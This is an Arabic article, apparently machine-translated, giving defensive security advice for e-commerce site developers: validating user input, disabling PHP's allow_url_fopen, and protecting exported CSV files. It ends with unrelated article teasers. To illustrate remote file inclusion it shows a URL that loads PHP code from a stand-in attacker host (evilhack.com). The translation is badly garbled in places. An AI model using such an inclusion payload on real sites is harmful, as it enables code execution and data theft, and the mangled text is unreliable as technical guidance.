الأمن في موقع التجارة الإلكترونية يحتاج إلى أن يكون هذا أحد الاعتبارات الرئيسية عند وضع موقع للتجارة الإلكترونية أو البرامج. ويحتاج إلى أن يكون على علم بجميع الاعتبارات الأمنية عند تصميم الموقع. مع التجارة الإلكترونية أصبحت أكثر شيوعا في هذه الأيام ، أن عدد الهجمات الأمن هو بالتأكيد زيادة. جنون العظمة هو شيء صحي للتجارة الإلكترونية مطوري الموقع ، ونحن بحاجة للحفاظ على ما يصل إلى البوابة مع القضايا الأمنية ، والحفاظ على آذاننا وعيوننا مفتوحة. على الرغم من الثغرات الخطيرة التالية ، والثغرات التالية إذا كان موجودا بسهولة الثابتة.
المدرجة أدناه هي بعض الاعتبارات الأمنية التي ستدرج عند تطوير الموقع. هذه المادة لا تشمل سرقة من المتاجر الإلكترونية ، الرجاء راجع مقالتي منفصلة في هذا الشأن.
إدخال المستخدم -- كل المدخلات ، سواء كان ذلك الدخول في الكمية ، والبحث عن المنتج ، وإدخال اسم الخ ، ويحتاج إلى تصديق لشخصيات مشبوهة. إذا لم يتم ذلك ، فمن الممكن أن يدخل "؟>"،إغلاق السمات نهاية بى وتنفيذ بعض رمز بي.
هو الآن أكثر أمنا تسمح الأرقام والحروف من الألف إلى الياء (شملت عواصم) و 0-9 و أي شيء آخر ، بدلا من تقديم قائمة من جميع الحرف التي لا ينبغي أن يكون هناك. السيناريو يحتاج إلى التحقق من صحة كل حرف من خلال التمرير واحدا تلو الآخر. هذا يحتاج إلى أن يتحقق في الجانب باستخدام ملقم التحقق من صحة ، وليس جافا. باستخدام ملقم الجانب الإدخال التحقق من الصحة لا بد من الحفاظ عليها الأحرف غير المرغوب فيها
يوجد رئيسية أخرى عند تنفيذ فب] رمز. عند استخدام [فب] هناك وضع يسمى allow_url_fopen الذي يتيح فتح الملفات من نصي بي. هذا الإعداد ينبغي أن يكون مطفأ ، الا للضرورة القصوى.
مجرد تصور لديك [فب] النصية لكلا رؤوس الثابتة وتذييلاتها ، والوصول إلى صفحات الويب الخاصة بك ستكتب في http://www.mysite.com/index.php؟page=page2. كل ما يتطلبه الأمر هو المتطفلين لتشغيل برنامج نصي من خلال تعديل هذه المعلمات عن طريق الكتابة في "http:// www.mysite.com/index.php؟page=http://www.evilhack.com/hacker.txt" مع بعض رمز [فب] في الملف "hacker.txt". هل يمكن أن يكون كل شيء وارد ، [فب الملفات للقراءة ، وحذف ، معلومات حيوية المسروقة.
إذا لم تكن متأكدا مما إذا كان هذا الإعداد أو إيقاف تشغيله ، انسخوا التالية فب] رمز إلى ملف نصي ، وتحميلها إلى خادم الويب :
phpinfo () ؛
؟>
عند الوصول إلى السيناريو الخاص بك على خادم الويب الخاص بك ، يجب أن تأتي عبر allow_url_fopen وضع تحت التكوين.
ألف مستخدم الكمبيوتر ، ويمكن في ظل الظروف العادية لا يجد قيمة هذا الإعداد.
كن حذرا من البيانات التي تم تصديرها مثل أوامر ، والمنتجات وملفات CSV في الخلية. إذا كانت هذه البيانات التي تصدر من سيناريو ويتم الاحتفاظ على خادم الويب تحت أي اسم ملف مشترك. http://www.mysite.com/admin/output_tables.csv. هذا هو فقط حقا مشكلة عند البيانات التي تم تصديرها موجودة في الملف في الدليل الذي هو في متناول الجمهور. هناك طريقتان لمنع هذه الثغرة الأمنية -- أولا يكون ملف الإخراج وراء كلمة السر المحمية الدليل ، وثانيا أن البيانات الموجود داخل أتش تي أم أل شكل ناحية النص على عنصر نصي. وstoreowner ثم يمكن نسخ هذه المعلومات من textfile وإنشاء ملف جديد على أجهزة الكمبيوتر الخاصة بهم ولصق المعلومات هنا.
كل ما يتطلبه الأمر هو أن تجد هذه القراصنة اسم بها عن طريق فحص برمجيات التجارة الالكترونية لعرض الموقع والبحث عن نفس اسم الملف على موقع حقيقي.
المدرجة أدناه هي أكثر المواد ذات الصلة الى المادة المذكورة أعلاه من "التجارة الإلكترونية" المادة الفئة.
المهتمين في المادة المذكورة أعلاه "التجارة الإلكترونية الأمن -- سد الثغرات الأمنية" هي أيضا مهتمة في المواد ذات الصلة الواردة أدناه :
تشغيل البريد الأعمال التجارية ، ليس فقط عن حفظ موقع الويب الخاص بك وتشغيلها. الزبائن تعتمد على قدرتك على خدمتهم عن طريق الهاتف والفاكس والبريد الإلكتروني ، أو غيرها من الوسائل ، وهذا يتطلب من جميع الأنظمة الخاصة بك أن تعمل لتكون قادرة على تلبية طلبات العملاء.
قبل بضعة أيام مرة أخرى بعد أن كنت دردشة مع صديقي. كان يحتفل بعيد ميلاد الطفل 1st وكان لتشغيل ما بين مسقط رأسه في ولاية كيرالا وتشيناي ومكان عمله. هو ورفاقه أفضل النصف سافر بين هذه الأماكن ما لا يقل عن 4 مرات في آخر شهر واحد.
إذا كنت قد تم القيام التجارة الإلكترونية من أجل أي قدر من الوقت ، سيكون لديك المعروف أن هناك أكثر من scamers حقيقية مقدمي خدمات الجملة الدليل دروبشيب. في عالم الأعمال التجارية الإلكترونية ، Salehoo والعلامات التجارية في جميع أنحاء العالم على حد سواء مقدمي الخدمة السمعة التي اكتسبت شعبية في السنوات القليلة الماضية.
إذا كان لديك أي وقت مضى لمتاجر التجزئة على الانترنت ، وربما كنت قد سمعت عن Salehoo أو حتى أنها تستخدم لصالحك. إذا كنت بدأت للتو مع عملك ، وربما يكون الخلط كنت مع Salehoo هناك اراء متباينة. الآن ، دعونا نلقي نظرة على ما Salehoo هو حقا كل شيء عن والخدمات التي تقدمها والتي تميل إلى إغفال الكثير.
كم من الناس هل تعرف أن شيئا ما قد تم شراؤها عبر الإنترنت؟ إذا كان لديك مثل لي عدد لا بأس به ، وهذا هو السبب في التجارة الإلكترونية في العالم الجديد على الانترنت للتسوق. ولكن الذي يدير هذه مخازن البيع بالتجزئة على الإنترنت؟ الناس مثلك ومثلي ، هذا هو السبب في هذا هو ازدهار وسوف تستمر في الازدهار الآن وبشكل جيد في المستقبل.
إذا كنت مروحة كبيرة من أحدث المنتجات الإلكترونية ، وكنت قد تميل لفكرة قيد التشغيل الخاصة بك على الانترنت التجارية والالكترونيات. ليس من الصعب أن تبدأ عند اتخاذ استفادة كاملة من إسقاط الحق خدمات النقل البحري والالكترونيات ، وهناك الكثير لتختار منها.
هل من أي وقت مضى الذهاب الى المتجر المحلي الراحة ويتساءل عما سيكون عليه اذا كنت تملكها؟ هل يكون مالك جيدة ، فإن الناس مثلك؟ كذلك هذه المادة سوف تظهر لك فوائد امتلاك الخاصة بك على الإنترنت متجر بيع بالتجزئة ، أو المعروف باسم التجارة الإلكترونية التي تختلف من المتجر المحلي الحقيقي الراحة.
![[أدثيس] المرجعية الاجتماعية زر](http://s9.addthis.com/button0-bm.gif){kind=small}
